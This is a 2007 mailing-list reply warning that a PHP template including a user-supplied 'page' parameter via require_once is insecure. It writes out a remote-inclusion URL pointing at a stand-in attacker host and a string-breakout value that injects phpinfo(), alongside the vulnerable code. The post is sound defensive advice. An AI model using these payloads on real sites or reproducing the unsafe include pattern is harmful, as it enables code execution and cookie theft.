[thelist] PHP template code security sufficient?
Paul Bennett
Paul.Bennett at wcc.govt.nz
Tue May 15 17:04:15 CDT 2007
consider this:
template.php?page=http://www.my-nasty-cross-site-scripting-site.net/i-want-to-steal-your-cookies
<div class="body">
<?php @ require_once ("$page.html"); ?>
</div>
Or
template.php?page=test.html");phpinfo();echo ("redherring
Which could beciome somwething like:
<?php @ require_once ("test.html");phpinfo();echo ("redherring"); ?>
/*
Require some file
Print out all the php and server info to the user
Echo some useless data
*/
Depending upon how robust your security checks are (the article has no mention of any), this has the potential for injecting outside content into your rendered source code, which may have XSS vulnerabilities, or allowing the user to control script execution (as in the last example).
Just my 2c,
Paul
More information about the thelist
mailing list